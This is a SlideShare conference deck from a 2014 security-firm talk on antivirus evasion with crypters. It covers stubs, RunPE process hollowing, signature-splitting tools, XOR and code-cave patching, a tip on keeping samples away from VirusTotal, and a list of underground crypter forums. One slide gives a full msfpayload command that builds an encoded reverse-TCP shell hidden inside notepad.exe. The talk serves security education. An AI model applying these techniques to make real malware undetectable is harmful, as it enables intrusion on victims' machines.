Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay

3,096 views

Published on

AntiVirus Evasion Techniques
Use of Crypters
Presentation 2k14 at MundoHackerDay Congress
Kevin Mitnick was also there ;)

Published in: Technology
  • Be the first to comment

AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay

  1. 1. AntiVirus Evasion: Use of Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
  2. 2. Whoami ncd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Electrical Engineer and Master in Information Security Co-founder of INCIDE: Electronic Evidence Experts Forensics / Expert Witness Reports Incident Response IT Security Auditors and Colsultants ! ncd:~ apasamar$ rm apasamar.cv
  3. 3. what is this about... • Introduction • AV’s how they work • Malware types and AV detection • Evasion techniques • Auto-encryption, Polymorfism, Ofuscation, Compresion • Crypters • types • stub • stub FUD • Modding techniques • Resources
  4. 4. introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
  5. 5. introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • AV Companies —> MALWARE Detection • BAD GUYS: Undetect MALWARE
  6. 6. introduction Bad guys objective:
  7. 7. introduction Bad guys objective:
  8. 8. AV howto • AntiVirus scan binaries on HARD DISC • They do not SCAN MEMORY, only binaries that ‘start’ the running processes • Scan for signatures: binary sequences @ AV DataBase • Look for malicious tecniques (Heuristics):API’s, functions, XOR, etc • Sandbox (partial execution):look for decryption routines, etc
  9. 9. AV howto EJECUTABLE DISCO RAM PROCESO ? SCAN ? AV
  10. 10. AV howto • AV analysis process: Atacs
  11. 11. AV howto • Recomended: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin
  12. 12. AV howto • Metasploit Framework (Rapid7) • Community Edition: • msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: • Generate AV-evading Dynamic Payloads
  13. 13. types of malware and AV detection • Comercial SPY Programms: (white list, signed) • e-blaster • 007 • perfect keylogger • …
  14. 14. • Malware newly created: • LOW detection (NO known signatures) • possible heuristic detections types of malware and AV detection
  15. 15. • Existing Malware: (very well known, signature and heuristic detections) • trojans (BiFrost, PoisonIvy,CyberGate, SpyNet, Darkcomet) • downloaders • passwords stealers • reverse shells types of malware and AV detection
  16. 16. How can we make undetectable malware already detected by AV? • C r y p t e r s: • Software allows you to encrypt ANY MALWARE doing it undetectable to AV.
  17. 17. crypters
  18. 18. builder / stub • Builder: • Is responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE • Stub: • Its mission is to decrypt and run the ENCRYPTED MALWARE
  19. 19. ! ! ! ! ! ! ! ! ! CRYPTER + STUB STUB DETECTED MALWARE ENCRYPTED MALWARE STUB CRYPTER (Builder) XOR, RC4, ... exe dll resource builder / stub
  20. 20. STUB CRYPTED MALWARE STUB CRYPTED MALWAREKEY splitter splitter A resource section can always be used builder / stub
  21. 21. • Crypters types: • ScanTime • RunTime builder / stub
  22. 22. • ScanTime STUB CRYPTED MALWARE DETECTED MALWARE HARD DISC AV stub
  23. 23. • RunTime STUB ENCRYPTED MALWARE HARD DISC RAM DETECTEDMALWARE AV stub
  24. 24. • STUB modules: • Decrypt Routine • RunPe (Dynamic Forking) Routine ! stub
  25. 25. RunPE o Dynamic Forking CreateProcess PROCESs 1 (CREATE_SUSPENDED) GetThreadContext PEB EBX EAX BaseAddress 1 EP I +8 PROCESS 2 ReadFile WriteProcessMemoryEP 2 BaseAddress 2 SetThreadContextResumeThread
  26. 26. FUD • Target: FUD Stub (Full UnDetectable) • From Source Code • From Binary Code • ¿How? • MODDING
  27. 27. modding source code • Manually or using obfuscation tools: • Function replacement (SPLIT,..) • Funciones/strings/variables replacement and ofuscation. Use of rot13 or Hex encoding • Encrytion: RC4 and XOR are very well known by AV • Alternatives:TEA, DES, etc • Alternative RunPE Routines • Fake APIs • TLB (Tab Library File) • Trash code
  28. 28. • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips modding binary file
  29. 29. • We have to Undetect STUB, BUILDER is only a tool used at home, not in the wild • First of all is to FIND AV SIGNATURES: • Simple Signatures • Multiple Signatures • Heuristic Signatures modding binary file
  30. 30. • Recomended: “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team modding binary file
  31. 31. • ¿What if we use a simple Encrytion/Decrytion rutine inside the STUB? stub.exe EP Signatures stub.exe OLD EP Signatures NEW EP Encrypted Decrytion Rutine modding binary file
  32. 32. • ORIGINAL STUB MULTIPLE AV SCAN modding binary file Do NOT use VirusTotal for these Scans or your STUB samples will be send to AV Companies :(
  33. 33. • ENCRYPTION ROUTINE • NEW EP • INSERT ROUTINE • .text SECTION • from offset 1050 • to Import Table modding binary file
  34. 34. • ENCRYPTION ROUTINE AT NEW EP • used only to encrypt .text section (used once) Set breakpoint here, after encryption routine modding binary file
  35. 35. • DECRYPTION AND EXECUTION AN NEW EP modding binary file
  36. 36. • MODIFIED STUB MULTIPLE AV SCAN 16 AV’s KO modding binary file
  37. 37. modding binary file • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips
  38. 38. • DSplit: Header EXE body Header EXE body 1000 bytes Header EXE body 2000 bytes Header EXE body 3000 bytes Header EXE body ··· Nx1000 bytes modding binary file
  39. 39. • AvFucker: EXE bodyHeader 0000000000 1000 bytes Header EXE body0000000000 1000 bytes Header Cuerpo EXE0000000000 1000 bytes Header EXE body ··· 0000000000 1000 bytes modding binary file Header EXE body
  40. 40. • RIT Technique • Find out AV Signature • If Signture is located at instructions code —> break flow • jump to another address (hole in section where yo can write your code) • Execute pending instrucionts • Return/jump to the appropriate instrucion modding binary file
  41. 41. • XOR Tecnique • Find out AV Signature • Apply to a byte XOR with any value i.e. 22 • Modify EP or jump to your hole • Apply XOR 22 to the modified byte • Return/jump to the appropriate instrucion modding binary file
  42. 42. Detected bytes (EP): XOR of the detected bytes: New EP ( XORs and jump to original EP): modding binary file
  43. 43. other techniques • Add Fake APIs • Hex strings edit • Move/change function calls • Change funtion call type: by name/by offset • Insert detected dll function into Stub Code !
  44. 44. resources • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org !
  45. 45. Avda. Diagonal, 640 6ª Planta 08017 Barcelona (Spain) info@incide.es http://www.incide.es http://www.twitter.com/1NC1D3 http://www.atrapadosporlosbits.com http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 A NY Q U E S T I O N S ?

×